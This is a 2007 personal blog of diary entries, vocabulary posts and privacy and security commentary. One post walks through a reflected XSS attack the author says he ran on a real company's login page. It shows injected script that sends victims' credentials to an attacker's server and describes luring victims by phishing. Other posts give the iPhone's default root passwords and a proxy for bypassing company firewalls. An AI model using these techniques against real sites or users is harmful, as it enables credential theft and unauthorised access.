ok so I'm getting a grip: here's the day-to-day plan. I'm looking for a new car, I'm streamlining my life and focusing on positivity, I've decided that all spare time spent at work not doing work will be spent outlining a series of short stories I'm writing (which center around a girl in a coma - but it's never mentioned that she's in a coma - and her two past boyfriends, one who leaves her but that isn't mentioned and instead he's treated to a colorful and twisted death, and the other who secretly plans to put her in a coma - but that's not mentioned either) that will hopefully be realized as genius and will help me get into grad school. less painful pining, more prosaic opining - that's the immediate plan. Past that, maybe this crazy scammy financial career might take off, but it's doubtful and certainly not what I want to be doing for the rest of my life. Save money; Grad school. Grip time.
oh and I'd like to move out of my house and into l33to's apt. but my asshole friend Brad (who's not really an asshole) has already got his grubby giganti-man hands all over that room. That jerk. Now he's going to go buy me Wendys. He's a pal.
word of the day
entropy (noun) - (in data transmission and information theory) a measure of the loss of information in a transmitted signal or message.
RSA and public key encryption
for those interested in RSA and public key encryption i thought it'd be interesting to post a list of the ten largest known primes to grant one solace in knowing they shan't fear the idea of guessable primes despite the current (emphasis on current) finite list of primes.
however it should be noted, public key encryption is vulnerable to man in the middle attacks where an attacker can falsely assume one of the receiving end points and provide a fake public key.
7.17.2007
flaws in iPhone's web dial
just received this email from a member of the webappsec mailing list...
The Apple iPhone's Safari web browser has a special feature that allows the user to dial any phone number displayed on a web page simply by tapping the number. SPI Labs has discovered that this feature can be exploited by attackers to perform various attacks, including:
-Redirecting phone calls placed by the user to different phone numbers of the attacker's choosing
-Tracking phone calls placed by the user
-Manipulating the phone to place a call without the user accepting the confirmation dialog
-Placing the phone into an infinite loop of attempting calls, through which the only escape is to turn off the phone
-Preventing the phone from dialing
These types of attacks can be launched from a malicious website, from a legitimate website that has Cross-Site Scripting vulnerabilities, or as part of a payload of a web application worm.
For example, an attacker could determine that a specific website visitor "Bob" has called an embarrassing number such as an escort service. An attacker can also trick or force Bob into dialing any other telephone number without his consent such a 900-number owned by the attacker or an international number. Finally, an attacker can lock Bob's phone forcing Bob to either make the call or hard-reset his phone resulting in possible data loss.
SPI Labs researchers reported these issues to Apple on July 6 and are working with Apple to remediate the problems. However, SPI Labs recognizes the unique urgency of these issues and the large number of people that could be affected. As such, SPI Labs recommends that iPhone users do not use the built-in Safari browser to dial telephone numbers until Apple resolves these issues.
And no, it's not a buffer overflow. I'd be hard pressed to buffer overflow my way out of a Win95 box :-)
word of the day
perfidious (adj) - deliberately faithless; deceitful. Synonyms: false, disloyal, unfaithful. "dr. comfort probably won't find solace in blaming me for his mother's perfidious relationship with his father."
7.16.2007
George Orwell, a literary hypocrite?
So I just recently finished reading George Orwell’s dystopian novel 1984, not really for the sake of personal enjoyment but rather as a tool of reference for future information privacy/information dissemination readings I’m sure to come across in the near future. In my field of study 84 is referenced as commonly as Lindsay Lohan rehab stories are covered by CNN. At first they seem interesting and amusing, but eventually they lead to an inevitably all too familiar annoyance. Despite this “annoyance” I felt an obligation to reread the novel, feeling as though my lackluster skim through back in high school wasn’t quite good enough.
So anyway, here’s my book report. The novel is incredibly slow and doesn’t pick up until you’re 100 pages in or so. Then it picks up a little bit but not enough to keep you fully enthralled. You struggle through till the end; eventually reach a somewhat interesting conclusion and that’s it. Oh yeah, it’s also a metaphorical piece representing Orwell’s ill feelings towards totalitarianism and imperialism. The end.
In "Politics and the English Language," George Orwell provides six rules for writers:
- Never use a metaphor, simile, or other figure of speech which you are used to seeing in print.
- Never use a long word where a short one will do.
- If it is possible to cut a word out, always cut it out.
- Never use the passive voice where you can use the active.
- Never use a foreign phrase, a scientific word, or a jargon word if you can think of an everyday English equivalent.
- Break any of these rules sooner than say anything outright barbarous.
Take notice of the two rules highlighted in bold. 84 is engrossed with some complicated dialog and by no means do you get the impression he is “cut[ting]” back in order to benefit from simplicity. Here’s a list of 246 vocabulary words from 1984 commonly found on the SATs varying in difficulty. Granted not all are all too difficult, but a number of them are.
Also interesting, in 1984 we the reader are commonly exposed to a concept known as doublethink. Doublethink is “the act of holding two contradictory beliefs simultaneously, fervently believing both.” So are Orwell’s six rules for writers simply a self-induced instance of doublethink?? Is it the case that he truly believes in these said rules yet at the same time believes in the polar opposite and proves so through contradictions in his writings???
I think it’s safe to say I’ve discovered something big here. Call the press.
angry
hm so just stumbled upon this interesting tidbit.
"In March, the Justice Department's Inspector General revealed that FBI agents had sent a flurry of fake emergency letters to phone companies, asking them to turn over phone records immediately by promising that the proper papers had been filed with U.S. attorneys, though in many cases this was a complete lie. More than 60 of these letters were made public today as part of a FBI document dump in response to a government sunshine lawsuit centered on the FBI's abuse of a key Patriot Act power."
instead of me getting mad and composing a 1000 word rant i've decided simply to quote a user from the digg community in response to the article.
"the government lies?"
word of the day
capitulate (verb) - to surrender unconditionally or on stipulated terms; to give up resistance. Synonyms: yield, acquiesce, accede, give in.
7.13.2007
Wii SQL statements
Who wants to do work on a Friday afternoon right before the weekend?? Certainly not I, so instead I've decided to waste a little time writing up a few pro-Nintendo Wii/hate on XBox360 and PS3 SQL statements. If this doesn't get me laid I don't know what will.
Walking through a real life XSS attack
This is a segment from a cross-site scripting (XSS) paper I wrote recently for graduate school “Introduction to Reflected XSS”. It should be noted that this is a real life attack I performed on a real company’s login application however I removed the URL and company name for obvious reasons. I walk through the various steps taken including finding a legitimate XSS hole, manipulating the hole, writing a malicious script to exploit the hole, and finding potential victim users. Feel free to leave both questions and suggestions in the comments; I’d love to hear them. Without further ado here’s the attack (most interesting) portion of my paper.
Walking Through a Reflected XSS Attack
Introduction - Now I’m going to walk you through an actual real life reflected XSS attack and explain the steps taken in doing so. For obvious reasons a great deal of information in regards to the victim’s Web app and URL will not be disclosed. Also, this XSS attack is being revealed to help better application developer’s understanding of XSS and to make apparent how many Web apps are in fact susceptible to such attacks.
Evaluate your target’s Web app from an attacker’s perspective - First things first, let’s evaluate and study our target Web app. Let’s begin by first evaluating the interface in Figure 1.4. We see our target Web app is for “Company X” and similar to many other common login Web apps. It is composed of two text fields one of the text fields is for a user’s “Username” and the other for the user’s “Password”. Next thing I notice is the URL query shown in Figure 1.3.
Figure 1.3
For obvious reasons the first segment of the URL has been removed however the interesting section still remains. First thing I notice is the '/cgi-exe/' in the URL.
CGI (Common Gateway Interface) is a standard protocol for interfacing external application software with an information server, commonly a web server. This allows the server to pass requests from a client Web browser to the external application. The Web server can then return the output from the application to the Web browser. Next, I notice the ‘pg=index’ in the URL query. The word “index” simply points out that this is the top end or head node of the tree for the Web app that can branch off into many other additional children pages once one attains access. This information is very important to me because many Web apps using CGI are susceptible to reflected XSS attacks in the URL query.
Figure 1.4
Right off the bat I have a perfect spot to insert my test script to see if this Web app might be vulnerable to XSS. So I take a stab at it and insert my alerting “test” script into the URL query seen in Figure 1.5.
Figure 1.5After running the test script it first appears as though it was unsuccessful. Instead of receiving a pop-up window alert I receive the following page
Figure 1.6
At a quick glance it appears as though nothing happened and I just simply had the original “index” page returned, but if you take a close look and look inside the “Enter Username and Password” form you’ll notice an out of place quotation mark and greater than character (“>). It becomes quite apparent that my test script did have an effect on the Web app despite not being my original desired effect. Often times when pen testing (penetration testing) you’ll stumble upon unexpected results from actions made that are very informative and can be used later down the line.
My next step is to take a look at the HTML source code to see what is going on with the (“>) in the middle of the “Enter Username and Password” form. Below is a segment of the source code revealing a great deal of information about the placement of my script as well as a great deal of other useful information.
Take a good look at the red text above. Disregard NAME=”uname” and NAME=”pass” we’ll get back to that, but rather focus on our script and where it was inserted into the html source.
The once ambiguous (“>) in the middle of the Web app form can now be explained. The test script I wrote was inserted in the middle of the “INPUT TYPE” tag and due to my quotation marks (“) and use of the greater than (>) less than (<) symbols it accidentally was mistaken for code to close the tag and thus leaving the desolate (“>) by itself in the middle of the form. By quickly looking at the code I realize all it will take is a quick fix and my script should run correctly. I simply need to insert a (“>) in the URL query before I insert my script. This will close off the “INPUT TYPE” tag and thus permit my script to run correctly. Now take a look below at the new and improved URL query. Highlighted in red is the modification made.
Now once we run this script we receive the following.
Figure 1.7
SUCCESS!! We can now see with the modifications made above that we are in fact capable of running successful scripts and thus this site is in fact susceptible to Cross-Site Scripting attacks. Next on our “to do” list is writing a malicious script to take advantage of this hole.
Writing your own malicious script to manipulate the target - The tough part of our job is done, now it’s time to be creative and write a script that will help me as an attacker obtain a client’s username and password. Remember, Cross-Site Scripting isn’t a direct attack against the Web application but rather an attack on the Web applications users.
As mentioned earlier Cross-Site Scripting attacks are very diverse and can be performed in countless ways. In this scenario, I myself as the attacker wish to steal the values of the username and password fields as a victim logs in. Following doing some research I discovered a clever idea for a malicious script that would work here nicely. The concept of this script was attained from a Cross-Site Scripting paper written by Kevin Spett of Spidynamics. Before we delve into the script lets take another hard look at the html source code from our target site.
It is now time to focus on NAME=”uname” and NAME=”pass”. Both of these are in reference to the fields that will accept the Username and the Password. The username field has been named “uname” and the password field has been named “pass”. Generally Web app developers aren’t very creative with field names. Field names for usernames and passwords are for the most part very easy to find in the source code. We now have the necessary information for our script. So by placing the script below into the URL query and injecting it into the code we should be able to attain an unsuspecting victim’s Username and Password. 
(form action="/cgi-exe/cpage.dll" method="GET") –The form will perform an HTTP GET request which will have data sent via query strings.
uname.value+':'+document.forms(1).pass.value") -- Next we specify the URL of the newly created image, that URL being ‘attacker_server’ and following that would be the values of the “login” and “password” fields containing the victim’s data.
Finding user victims – Now that we’ve found a hole in the Company X Web app and written a malicious script to exploit it, our next step is finding user victims. Finding victims can be done in many different ways however creativity and one’s social engineering skills are key. Social engineering is the practice of obtaining confidential information by manipulation of legitimate users. A social engineer will commonly use the telephone or Internet to trick people into revealing sensitive information or get them to do something that is against typical policy. By this method, social engineers exploit the natural tendency of a person to trust his or her word (Mitnick).
Thank you and we apologize for the inconvenience
For the link we simply use the HTML below incorporating our script.
Once the victim follows the link and logs in, the username and password are sent over to my server thus giving me a valid account to do with what I please. This technique is often referred to as “Phishing”. Phishing is an attempt to fraudulently acquire private information, including passwords, credit card data, social security numbers, etc, by masquerading as a trustworthy person or business in an electronic communication.That should do it, good luck, be ethical.
word of the day
inchoate (adj) - in an initial or early stage; incomplete; disorganized: "The act of writing forces one to clarify inchoate thoughts."
7.12.2007
the concept of “secondary use”
In continuation to my post regarding Daniel Solove’s most recent paper I decided to focus on one of his more compelling points regarding a concept known as secondary use (also, this is simply a diminutive personal exercise for myself to make sure my brain has not yet failed me despite lack of sleep and an immeasurably mind-numbing summer internship).
First lets focus on the characteristics of the “nothing to hide argument”, the most common argument faced by all privacy advocates when denouncing both legal and illegal government surveillance, (key word being “surveillance”). The “nothing to hide argument” focuses only on two kinds of privacy problems (See Taxonomy of Privacy for additional privacy problems) including both the disclosure of personal information and information collecting surveillance. By using the “nothing to hide argument” one blindly closes the door to the vast number of other privacy problems that exist; one of these other problems being “secondary use”. The argument close-mindedly and unfairly assumes a particular view about what privacy entails without delving past the surface of the concept.
So what meaning does the problem of secondary use hold in the context of information privacy? Solove claims it “involves data being collect for one purpose being used for an unrelated purpose without people’s consent.” This is pretty straightforward with no ambiguous lawyer semantics, common of most Solove publications. I often attribute the idea of secondary use being implemented by evil companies that enjoy selling my information to third parties for targeted advertising purposes. By no means when I originally submitted my personal information to a company or organization for one purpose did I intend to have it distributed for other things like targeted advertising.
Now pause, take a minute to think, when you sign a contract with a phone company or ISP you disclose personal information as a means to use their services. The contract isn’t hard to understand, you want to use there services and are willing to submit your personal information to go about doing so. But where in that contract does it say you are also submitting your personal information to be used by the government for data mining purposes?? No where. The “nothing to hide” argument doesn’t come close to defending this problem simply because it doesn’t acknowledge its existence. You’re signing a binding contract for one purpose yet it’s being used for multiple purposes without an individual’s permission and oversight. Is that right?? And who’s the one monitoring the government’s data mining techniques to make sure no wrong doing is being done, the government?? That’s like saying we should have allowed Enron (RIP) the ability to regulate itself.
word of the day
sagacious (adj) - having or showing acute mental discernment and keen practical sense; Synonyms - shrewd.
7.11.2007
how's your mood? how's that song?
Do you ever just feel dumb? I feel sometimes so immediate, so in that particular moment, that I'm infinitely ashamed of every moment not spent studying everything up to that point. And then it passes, but not without a dwindling fear that aches in the back of my spine for hours.
I woke up today in horrible pain. I had greatly underestimated (as I had similarly in the previous 22 years of my life) the virtue of stretching before activity. Sure, you could say "well, you're just getting back into exercise, of course you're going to be a little sore. It'll pass." And it will, but it's damned frustrating and defeating at the moment. Dragging myself up from bed (not by personal choice or outside motivation, but rather due to the slumber-zombie slap of the snooze button on my particular alarm clock that, for a reason unknown to me still, is set for an hour long snooze session and doesn't apparently have anything to do with shutting the actual alarm off - the alarm buzzes on throughout the snoozing period, playing a cruel joke on me), I turned on the light, eventually gave up with the damn clock and just turned it off, and I was officially awake - for better or for worse. It was worse, as it turned out, with instant pains like tetanus needles piercing the backs of my quads with ever shuffled, stumbling step.
I came to the quick conclusion after some coffee, a cigarette, some excedrin, two slices of left-over pizza (excellent breakfast food) I'd hidden from other family members in the vegetable crisper, that I was definitely not going to be venturing on an early morning run today. Anyway, it looked soggy out and, while that would never bother me in the least usually, I used it as ammunition for my pitied self-reassurance.
Not to look a day in the face at 11 a.m. and admit defeat so soon, I conceded to smoking a bowl and mowing the lawn. By noon the sun had come out and the damp grass was back to its bleached blond summer self. The still-wet branches of the pines pricked my shoulder as I mowed past them, adding annoyance to only the beginning of the mow. The hour went by smoothly, soundtracked by sonic youth, animal collective, blitzen trapper, and any band that could fuzz-slash its way into my morning soul.
I'm planning on applying to more jobs later, when I'm less sleepy.
how to combat the "i have nothing to hide argument"
anyone remotely interested in the field of information privacy should read this paper asap. it's the most recent publication from distinguished attorney and george washington professor, daniel solove. the paper entitled, "i've got nothing to hide," and other privacy misunderstandings, is a thought provoking piece that combats the simplistic argument you hear from idiots willing to succumb to government pressure and sacrifice their privacy rights simply because they feel as though "they have nothing to hide".
for those of you that don't know solove, he's basically about 10 years ahead of his time in regards to privacy law. currently there isn't much going on in the field, in fact it's almost impossible to find a privacy profession (the only one that comes to mind are attorneys writing privacy policies for different company websites) but i can promise you soon information privacy will become a significant player finding it's own niche in the information security field.
i've read just about every solove paper (A Taxonomy of Privacy probably being his best) and strongly recommend his book, The Digital Person.
word of the day
misanthrope (noun)- one who hates people; a hater of humankind. "one might say dr. comfort is an inconspicuous misanthrope hidden behind a deceitful grin."
7.10.2007
what's the day? what's you doin?
Dr. Comfort Road to Recovery Journal: Day Two
I give up.
Ok not really. I'm still going strong, but not without setbacks. My second day of intensive self-reversal came with a late start, with my waking up at 10:30 rather than the planned 9 (which was pushed back from the previous day's foolishly set 7), making me feel already a little less productive right from the beginning. I didn't get straight up and run, either, like I had planned. I milled around for a bit, mulled over some oil-slick lookin' coffee, and then committed my second major offense of the morning: I had a cigarette before my run. As I puffed away and considered that I'd be huffin' and high-topping the hot hot pavement in less than 15, I couldn't help but feel like a complete idiot. But I just kept going on.
In the end it wasn't a completely worthless day. I did make it to that run, although it was cut short and with additional walking periods set between the running ( due to several factors not involving the cigarette, including: it was hott as dogg balls, my muscles were sore a something fierce from yesterday's workout and run, and also just because I was feeling much less empowered today). Taking everything in, I'm looking into adding some pre-run "stretching" to the routine, and not frowning upon future walk periods (walking is healthy and active too - I'm not looking to run a marathon or even be in that better shape, I just need something to get me going in the morning).
After some jub hunting and exercise and whatnot, I found myself feeling pretty good again; feeling like the day, while not as successful as the first, was at least a comparative second place, which was appropriate and I laughed at my own joke in my head.
word of the day
intransigent (adj) - refusing to agree or compromise; (noun) a person who refuses to agree or compromise, as in politics. Synonyms - uncompromising; inflexible; stubborn
5 ways to better one’s individual perspective on life
1. Promote autonomy amongst yourself and others – It’s through our individuality and diversity of mindset that enable us as living, thinking beings, to move forward in life without fear or hesitation. Avoid tunnel vision. One should look at a situation from a number of perspectives in order to grasp a comprehensive understanding of the task(s) at hand. This autonomous freedom of individual thinking will simply result in new ideas enabling individuals and society to prevent stagnation, progress, and move forward.
2. Live for the now, take risks – One who is willing to take risks is someone who is willing to make sacrifices. Individuals willing to make sacrifices in the face of fear are willing to go the extra mile for themselves. They have enough love for themselves that despite conscious knowledge of potential failure they know they’ve succeeded regardless of the end result. Fear of failure shouldn’t handicap one’s existence but should rather be a form of incentive to persevere and accomplish goals.
3. The glass is half full approach – Yes, I know, we’ve all heard this before but it’s this type of mentality that makes living worth living. Granted, anyone can make the conscious choice to go through life always looking at things from a negative perspective but where does that get you? A positive perspective on the other hand enables an individual to succeed and overcome hardship while at the same time preventing one from becoming overly consumed with fear of failure. Take a minute, smile, and believe in yourself and in others.
4. Focus on yourself as an individual; don’t become overly concerned with others – You yourself are your own person and in that lies the essence of life’s beauty. Life is an amazing privilege bestowed upon all of us. We as sovereign individuals have the innate ability to use our own intuition when it comes to making decisions, learning, accepting others, and framing our own unique mindset. Who better to make decisions concerning individuals then individuals with a thoroughly profound understanding of themselves?
5. Have sexual relations with as many individuals as possible – Self explanatory
7.09.2007
michigan state definition
word of the day
equivocal (adj.) - ambiguous; unclear; subject to more than one interpretation -- often intentionally so: "Republicans complained that Bill Clinton's answers were equivocal." (v. equivocate)
dr. comfort road to recovery: day one
Like a last message sent from earth out into space before the eventual great collapse of this civilization comes, I implore you to listen to my story. It's not a pretty story, and it's not even all that inspiring, but it has the opportunity to become one of those inspiring stories, if you listen.
I have found myself among a new group of disillusioned young people (currently the only group I can pretend to belong to), who have graduated from college, the supposed end all be all and consummate pedigree of a white collar youth background, and found that those starched white collars that once seemed so close have been huddled away by a selfish baby-boomers more concerned with their own dwindling life expectancies and number of boats they can afford in retirement than with refreshing the workforce with young upstarts hungry for experience and with talent to spare.
Do I sound angry? Probably, but anger is not my driving force anymore. I've decided to turn over a new leaf and live a life charged with positive energy. Slighted by the delusional lower-middle-upper class of a small town no more, I am setting a new standard in my own life and looking forward to opportunities every new day.
Sleeping until noon? a thing of the past. Smoking marijuana religiously? (and by that, i don't mean just once on Sundays), think again cheech. Drowning my sorrows daily? only if I'm appropriately stressed out by a day of hard work. I'm reversing the stigma of the slacker credo; for too long I've believed a life to be worth more than the amount of pages in a resume, and while I still believe that to be true, I've found that a life is nothing without a record. It's nothing without some hard evidence to point to and say: yea, I did that.
So I'm going to do That, every day. You're invited and more than welcome to join me on my new misadventures. Though they may not always be sunny, they'll at least beat burning yourself with cigarettes and crying in a corner (take my word for it). Hopefully, in a year's time, I can look back at this long road and realize that the journey was worth the trials, and very possibly that the journey is a reward in itself.
Stagnation be damned, I'm looking forward.
7.06.2007
auction off exploits, make some bank
a new site, WabiSabiLabi has just been launched which enables security researchers to auction off exploits they discover in various web apps and back-end systems. from what i've gathered any researcher who discovers a flaw can then register with the independent security lab, submit the exploit, and then have WabiSabiLabi personal verify it's validity.
personally i think this is a step in the right direction. every year a vast number of security analysts "ethically disclose" vulnerabilities to companies and organizations and receive little to no recognition or compensation for donating their time and efforts. sometimes these organizations go so far as to threaten taking legal action against someone who has voluntarily revealed a security hole to raise the company's awareness...hm, so yeah, that seems like the right thing to do...
it'll be interesting to see how they work to combat malicious buyers from purchasing exploits. if they can somehow manage to regulate this effectively it could provide an interesting marketplace for researchers and supportive organizations looking to improve their security.
word of the day
amalgamate/amalgamating (verb) - to mix or merge so as to make a combination. synonyms blend; unite; combine.
more iPhone hacking, no need for AT&T
it appears that prominent norwegian hacker jon johansen has done it again and made the impossible possible. some of you may remember him from years back as "DVD" jon or the guy that circumvented the DVD anti-piracy encryption code. come on, you remember DeCSS right?? probably one of the most brilliant reverse engineering feats of the last decade. well, on july 3rd he reported in his blog that he was successfully able to manipulate the newly released iPhone and activate the device without signing up for AT&T. with the recently discovered hack, "the iPhone does not have phone capability (yet), but the iPod and Wi-Fi work" according to johansen.
7.05.2007
new web proxy
just stumbled upon a new web proxy that works pretty well, my vioxx attorney (interesting name). it's significantly faster then the one i was using previously and i haven't had many issues with it dropping requests. so for those of you at work/school seeking privacy and looking for ways around your company's firewall i suggest using this.
word of the day
for some odd reason i get off on expanding my vocabulary and learning new words. thus i have decided to add "word of the day" to the blog. basically everyday i'll make a quick post with a given vocab word and it's corresponding definition(s) and throughout the course of the day i'll make a feeble attempt at actually using the word in a given real life scenario. after doing so, i'll update the original "word of the day" post and explain how i went about verbally implementing my new found knowledge as well as explaining how it went over with my unsuspecting vocab victim.
yes, i agree, this does in fact score a -2 on the "coolness rating system" then again, i have no shame. i encourage the four or five of you that actually read this blog to post in the comment section if you were able to use the given word on that given day. also, the comment section is an ideal medium to go about making fun of me for doing this. so without further ado, today's word is....
pervade/pervasive (verb) - to become spread throughout all parts. synonyms diffuse; fill.
7.03.2007
iPhone root pw cracked
well it only took three days (which is longer then i expected) for the iPhone root pw to be cracked. it appears all iPhones ship with pw's for two specified accounts, one being 'mobile' and the other obviously being 'root'. hackers were able to extract a list of readable characters from a disk image (very cool) that had the user account names and corresponding encrypted pw's. using john (a popular pw cracker - 'john the ripper') the pw's were decrypted in 16 seconds. not 17, not 18, but 16 seconds.
'mobile' - alpine
'root' - dottie
currently the iPhone has no terminal access thus no way to use the accounts. it'll be interesting to see how this unfolds.
sexually persuasive pictures of billy gates from 1983
so it has recently been disclosed that billy g and his boys at the evil empire have been using windows vista as a means to harvest user data. being the privacy advocate that i am, i knew something needed to be done...someone needed to impose on bill's privacy. upon a bit of snooping i was able to discover..hm, how shall we say, risqu'e photographs of the entrepreneur.
in this first one he's sprawled up on his desk starring at you with those big puppy eyes and suggestive smile.
in this next one bill appears to be going for the naughty in office "i'm gonna throw an old floppy disk at you pose". standard protocol for most male models in the early 80's.
put down your guns, pick up a laptop
first estonia, now russia…so it appears are good old friends from the cold war have begun to use cyber-warfare as a means to impair/take down a number of sites containing unfiltered political content.
7.02.2007
video games, politics, and a slice of lemon
the recent banning of Manhunt 2 in a number of countries and the adults only (AO) rating it received in the US has resulted in a number of questions regarding political intervention in the video game industry. one would assume the gaming industry placing a comprehensive content rating on a game (such as M-mature, T-teen, etc) and enabling the consumer to exhibit his/her own intuition in making a purchase would be sufficient..well a number of political figures feel differently. instead, they'd rather determine for YOU what YOU should be able to buy in this free market economy. lol, it's comedic.
well chalk one up for the gaming community. the times reports that michael d. gallagher has just recently been named president of the entertainment software association thus making him the gaming industry's chief lobbyist in washington. granted i hate political lobbyists of all sorts but i'll make an exception for a video game advocate pushing to maintain self-regulation in the video game industry. however, i wouldn't be surprised to see mr. gallagher get consumed with politics and money and let down myself and my fellow gaming brethren in some way. don't let me down michael or i might have to go Manhunt 2 on your ass.
the top 7 optical illusions that will f*** w/ ur head
happy monday all. to get your week started off on the right foot i figured i'd post something cool that i stumbled upon at work this morning. being monday morning and all, i'd rather surf the net aimlessly for stupid shit then contribute to my company in any regard (i have the "employee of the month" award in the bag). so without wasting any more time, here are some entertaining optical illusions for your viewing pleasure.
7.01.2007
planet-websecurity.org
christ1an, a contributing member to the web application security consortium mailing list has just launched a new project, planet-websecurity.org. it's simply an up-to-date compilation of the most recent news in the web security field. thus far it appears to have an auspicious future, i suggest you all check it out.
Subscribe to:
Posts (Atom)
